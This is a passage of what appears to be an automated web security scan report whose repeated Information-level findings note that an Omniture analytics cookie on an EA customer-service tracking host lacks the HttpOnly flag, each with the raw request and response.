A//www.info.ea.com%27%2C%2520%27info%27%2C%2520780%2C%2520800%2C%25200%2C%25200%2C%2520t&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:33 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:47:33 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:47:33 GMT
Last-Modified: Sat, 25 Jun 2011 13:47:33 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E049575-630B-08274CF4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www227
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
13.43. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536?[AQB]&ndh=1&t=24/5/2011%208%3A50%3A20%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&pe=lnk_e&pev1=http%3A//twitter.com/askeasupport&pid=View%20Answer&pidt=1&oid=http%3A//twitter.com/askeasupport&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:50:21 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:50:21 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:50:21 GMT
Last-Modified: Sat, 25 Jun 2011 13:50:21 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E04961D-7167-1669492C"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www664
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
13.44. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891?[AQB]&ndh=1&t=24/5/2011%208%3A47%3A41%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&events=event2&c1=Not%20Logged%20In&c2=4394%20Official%20EA%20Twitter%20Accounts&v2=4394%20Official%20EA%20Twitter%20Accounts&v8=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c10=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c15=EA%20Support&pid=Support%20Home&pidt=1&oid=http%3A//support.ea.com/app/answers/detail/a_id/4394&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:42 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:47:42 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:47:42 GMT
Last-Modified: Sat, 25 Jun 2011 13:47:42 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E04957E-289C-64EC62A2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www227
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
13.45. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639?[AQB]&ndh=1&t=24/5/2011%208%3A50%3A15%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&events=event2&c1=Not%20Logged%20In&c2=4394%20Official%20EA%20Twitter%20Accounts&v2=4394%20Official%20EA%20Twitter%20Accounts&v8=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c10=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c15=EA%20Support&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:50:15 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:50:15 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:50:15 GMT
Last-Modified: Sat, 25 Jun 2011 13:50:15 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E049617-7405-11B63051"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www414
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
13.46. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661?[AQB]&ndh=1&t=24/5/2011%208%3A48%3A18%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&pe=lnk_e&pev1=http%3A//twitter.com/ea&pid=View%20Answer&pidt=1&oid=http%3A//twitter.com/ea&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:19 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:48:19 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:48:19 GMT
Last-Modified: Sat, 25 Jun 2011 13:48:19 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E0495A3-354B-1AB15A04"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www664
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
13.47. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

